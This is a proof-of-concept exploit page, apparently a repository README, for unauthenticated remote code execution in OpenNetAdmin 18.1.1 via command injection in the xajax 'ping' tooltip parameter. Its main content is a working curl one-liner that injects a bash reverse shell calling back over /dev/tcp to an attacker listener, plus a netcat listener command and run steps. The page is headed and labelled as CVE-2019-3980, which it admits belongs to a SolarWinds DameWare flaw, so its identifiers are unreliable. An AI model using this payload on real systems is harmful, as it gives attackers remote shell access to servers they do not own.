POC details: ffef9744084a44a095d31e7acf0bf9ddc299a43e

Source
Related vulnerability
Title: SolarWinds DameWare Mini Remote Control agent input validation error vulnerability (CVE-2019-3980)
Description: SolarWinds DameWare Mini Remote Control is a remote control and desktop sharing tool from the US company SolarWinds; agent is one of its agent programs. SolarWinds DameWare Mini Remote Control agent v12.1.0.89 contains an input validation error vulnerability, caused by the product failing to validate input data correctly.
Introduction
# CVE-2019-3980 – OpenNetAdmin 18.1.1 Remote Code Execution

> ⚠️ **Disclaimer**  
This repository is intended **strictly for educational and research purposes only**.  
The information and code provided here can be used in **controlled environments**, such as private lab machines.  
**Unauthorized use of this code against systems you do not own or have explicit permission to test is illegal and unethical.**  
The author is **not responsible** for any misuse or damages caused.

---

## 🔍 About the Vulnerability

An unauthenticated Remote Code Execution vulnerability exists in **OpenNetAdmin 18.1.1** via its `xajax` AJAX request interface at `/ona/`.  
The `xajaxargs[]` values of a `window_submit` request are handed to the `tooltips` plugin, and the `ip=>` value of its `ping` action reaches a shell command without sanitization, so a `;`-separated command appended to that value is executed on the server as the web server user.  
This exploit uses that injection point to trigger a reverse shell back to the attacker's listener.

> **Note on the identifier:** CVE-2019-3980, as described at the top of this page and at NVD, covers an input validation bug in the SolarWinds DameWare Mini Remote Control agent, not OpenNetAdmin. The OpenNetAdmin issue is reliably identified by its Exploit-DB entry, 47691.

- **CVE ID:** CVE-2019-3980 (as labelled by the repository; see the note above)  
- **Exploit-DB ID:** [47691](https://www.exploit-db.com/exploits/47691)  
- **Vulnerable Application:** OpenNetAdmin 18.1.1  
- **Affected Parameter:** `xajaxargs[]` (the `ip=>` value passed to the `ping` tooltip action)  
- **Impact:** Remote Code Execution as the web server user (`www-data` in the demonstration below)  
- **Authentication Required:** ❌ No  
- **Network Access Required:** ✅ Yes (HTTP access to `/ona/`)  

---

## 📂 Exploit Overview

- **Exploit Type:** Command Injection → Reverse Shell  
- **Exploit Title:** OpenNetAdmin 18.1.1 – Unauthenticated RCE  
- **ExploitDB ID:** 47691  
- **Language:** Bash (via `curl`)  
- **Authentication Required:** ❌ No  

---

## ⚙️ Exploit Code

This Bash one-liner is a fixed-command variant of the Exploit-DB 47691 script. It sends a single POST request with `xajax=window_submit` to `/ona/` and injects the reverse shell command into the `ip=>` argument of the `ping` tooltip action. The `echo "BEGIN"`/`echo "END"` markers and the trailing `sed`/`tail`/`head` pipeline exist only to cut command output out of the server response; for a reverse shell they print nothing useful, and `curl` does not return until the injected shell exits.

```bash
#!/bin/bash
# Fixed-command variant of EDB-47691: one POST to /ona/ whose injected
# xajaxargs[] value spawns a reverse shell. Edit the placeholders before use:
#   <TARGET-IP>  - host running OpenNetAdmin 18.1.1
#   <YOUR-IP>    - attacker listener address
#   <YOUR-PORT>  - attacker listener port
# The injected value decodes to:  ip=>;echo "BEGIN";bash -c "bash -i >& /dev/tcp/<YOUR-IP>/<YOUR-PORT> 0>&1";echo "END"
# The sed/tail/head pipeline strips everything outside the BEGIN/END markers.

curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<YOUR-IP>%2F<YOUR-PORT>%200%3E%261%22;echo \"END\"&xajaxargs[]=ping" "http://<TARGET-IP>/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
```

> 🛠️ **Note:**  
Replace `<YOUR-IP>` and `<YOUR-PORT>` with your Netcat listener IP and port, and `<TARGET-IP>` with the OpenNetAdmin host.  
Start the listener first, in a separate terminal, because the `curl` request blocks for as long as the reverse shell is open:
```bash
nc -nlvp <PORT>
```

---

## 🎯 Demonstration

### 1. Showing the ONA Web Page and Version

![ONA Web Interface](./img/ona.png)  
> Screenshot of the vulnerable OpenNetAdmin interface and version.

---

## 🚀 Exploit Usage

### 2. Run the Exploit

```bash
bash shell.sh
```

![Exploit Execution](./img/exploit.png)  
> Screenshot of the script execution triggering the payload.

---

## 🐚 Reverse Shell

### 3. Reverse Shell Obtained

```bash
nc -nlvp <PORT>
```

![Reverse Shell](./img/shell.png)  
> Reverse shell caught as `www-data`.

---

## 📚 References

- [Exploit-DB 47691: OpenNetAdmin 18.1.1 – Remote Code Execution](https://www.exploit-db.com/exploits/47691)  
- [NVD entry for CVE-2019-3980](https://nvd.nist.gov/vuln/detail/CVE-2019-3980) (describes the SolarWinds DameWare Mini Remote Control agent issue, not OpenNetAdmin)

---

## 📝 Medium Blog

Check out the detailed walkthrough and theory on my Medium post:  
👉 **[Read the blog on Medium](https://medium.com/@cyberquestor/opennetadmin-18-1-1-remote-code-execution-exploit-db-47691-7c25c9b0ea68)**
File snapshot

```
/data/pocs/ffef9744084a44a095d31e7acf0bf9ddc299a43e
├── img
│   ├── exploit.png   (49K)
│   ├── ona.png       (139K)
│   └── shell.png     (76K)
└── README.md         (3.0K)

1 directory, 4 files
```